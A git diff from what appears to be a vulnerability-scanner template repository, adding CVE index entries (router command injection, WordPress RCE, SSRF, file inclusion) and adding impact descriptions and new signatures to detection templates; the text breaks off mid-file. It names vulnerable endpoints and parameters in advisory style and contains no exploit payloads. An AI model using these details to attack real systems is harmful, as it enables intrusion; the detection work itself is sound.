parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"} @@ -2191,7 +2202,9 @@ {"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} +{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"} {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} +{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"} {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} @@ -2207,11 +2220,13 @@ {"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} +{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} +{"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} -{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"critical","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} +{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} @@ -2222,7 +2237,9 @@ {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} +{"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} +{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} @@ -2236,8 +2253,7 @@ {"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"} {"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"} {"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"} -{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"} +{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"} {"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} {"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"} {"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"} -{"ID":"CVE-2023-46604","Info":{"Name":"Apache ActiveMQ - Remote Code Execution","Severity":"critical","Description":"Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.\nUsers are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2023/CVE-2023-46604.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 4117f61dfd..8a4288d9e1 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -db8c3c3eb9d43b2fcd262a91dc910e0f +966878414639a1d70cbb937632710839 diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index d82de2443e..5039ed4161 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -55,6 +55,7 @@ dns: - "servicebus.windows.net" - "visualstudio.com" - "-msedge.net" + - "msappproxy.net" - "trafficmanager.net" - type: word @@ -433,5 +434,4 @@ dns: regex: - "IN\tCNAME\\t(.+)$" - "IN\\s*CNAME\\t(.+)$" - -# digest: 4a0a004730450221008eca40fb73f32c811d6d1d7283bbf220eb09a81bbaa047e4204406dd1c4da012022033a3e578c9ee7d903cff9bc617af38353d49ba0cb65955487aca3e841cdbfc56:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2020/CNVD-2020-23735.yaml b/http/cnvd/2020/CNVD-2020-23735.yaml index 93f98edfc7..f4faaa0ca9 100644 --- a/http/cnvd/2020/CNVD-2020-23735.yaml +++ b/http/cnvd/2020/CNVD-2020-23735.yaml @@ -22,15 +22,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - - "display_errors" - condition: and + - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4Ndisplay_errors" -# digest: 4a0a00473045022034ca38e42eb10e3f993e1ec2346f3c0e8136adef3383573241671c6fc5c91e5e022100a81c4851e42aa7d04d2e7db0c381712c112273dfd1dba5c3673643e239dd5342:922c64590222798bb761d5b6d8e72950 + - type: status + status: + - 200 +# digest: 4a0a00473045022100c1f96a2e3c37026b0ac58408bbaaeff224ca2cd563e06d2861342ab73272d43602203a4b1a825e300c2d3243c6930d34d7108e534729c14184babc398ba3fb3a0956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2021/CNVD-2021-32799.yaml b/http/cnvd/2021/CNVD-2021-32799.yaml index 796167b833..7511eb7eaf 100644 --- a/http/cnvd/2021/CNVD-2021-32799.yaml +++ b/http/cnvd/2021/CNVD-2021-32799.yaml @@ -4,6 +4,8 @@ info: name: 360 Xintianqing - SQL Injection author: SleepingBag945 severity: high + description: | + The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information. reference: - https://blog.51cto.com/u_9691128/4295047 - https://www.cnvd.org.cn/patchInfo/show/270651 @@ -38,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022006cca5f941e35ce5c204962052c2d4eb74627fc58d6de9b9976b967b1643ea8f022100e2b50bf34a6ee4636802796f5b1e866212a29264161bbc98a5553a60186651d1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e6b9c102bfc4fd3eaa2d00c82e03d07f7309513da8828cc6c303d4d071c2d5540221009d3c3f3d937d8ac546abaa6d94a3aee02d5c4c7c8831dfbce456591d4b252eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 9703e7591c..6e8ab39c98 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -5,6 +5,8 @@ info: author: r3naissance severity: medium description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + impact: | + High: Remote code execution or denial of service. remediation: Upgrade to the latest version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220080130ec958d5667203f63c2fb769d081d8684edeb1132b8114624eb9cefeeeb022015c92a448c22916bdc29de05205539f746ae2fc9b6b641b54ef2b913d151c11f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d75cf6bb5b96928d10a267c9d3b68c6d215cafe2f946fc1e3c6faa5ba73986d1022100cf0262c0fa9aa5da8c6f8751c553cc77be07ca9fc62f3aec8bb35a8b9f16b490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index f391661eec..10c5c7f16a 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the affected device. remediation: | Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022058d9a8ffc9ad0c9eb0fa65e129eec136d44e8e6582b68665220d55745cff08270220209369d1debe9d289316990990aee95bdaa71cd748bcd23d1f7189442c298347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201446b3c9bf46dead91bf4ef4ad77cbe180d6d69fb175901a10fa0c1ede45e8640221009f8fada5bf28bf8ede431e3ef75a13367f4164a18df286db6e1528ed038181da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 6c576e31ec..4cc511bf5f 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability. reference: @@ -53,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100919662cf99fc2c8685a185341929e70c52f2d6e4708bffe8294fe45d56f7cb81022071b199174fe64ab885ef44d2c7d1e298ea1ee34b6eab5737b7afb1bd0b713799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220097cefba0b33bb087a8dba970ed43866b17c92bfc316e2e3d619b9b6485b57710221009ad2de84214b6c521984839454d0766d906957945e2b51dce527cd4c0cc82c50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index d6fa858eaf..dd72a4ab41 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface. remediation: Upgrade to the latest version. reference: - https://www.exploit-db.com/exploits/24068 @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205d3c4477a61a53a5207dd95d10b69b27e255779626d269dd24c329d22d574969022037aecc3ef5111112878affc3d64765c06c484c318e8435b97dcf1f44c9c9daac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009838e283e3afa06a62182a21bc8b0059f223c7716b521ee426f5a5971f3feadf022100dd82c1e652cb490cb66a1a96bc0aca2beecdf45fedf86f75b5376ac8fc69c6d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 77801a1ef9..108c014d2e 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft. remediation: | Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. reference: @@ -37,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a004730450220464a4d9ce1d6cbeaf71f551a06fd319a5a15203f7c40b1228809ef413ce6d869022100cb853dd541a12cbe5b12d10daaebc247d1b20e32d173b410d5191367fb6f5839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa37066896608be1f1389ed813b9756b52f89f2581a494bf04c0e91f743d7cd3022012425b62227648da21636d2b3acaa1fdb865e29f57e39c13c84e0e2511f4c908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 9fcb975ce4..5f20ec31d2 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -5,6 +5,8 @@ info: author: CasperGN severity: medium description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + impact: | + The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security. remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c31e97e6801605f82c05e1819cf99bdb1e7ad21b859fbf96bab1d67b1496832302201de7a5c5f9fd1f832a121691d1c419464c4d56aa1261f00b415c933633470308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fa68c993471257cf8942b7addbd0c8ba10500cf91c42f00109404cec47f6af0022100e5d9e9567e00ffecb85211757541b21325517ca1cba3705fa3c8e4437bf71706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 0a0daef60a..20a0675c96 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. + impact: | + An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system. remediation: | Apply the latest security patches or upgrade to a patched version of Horde 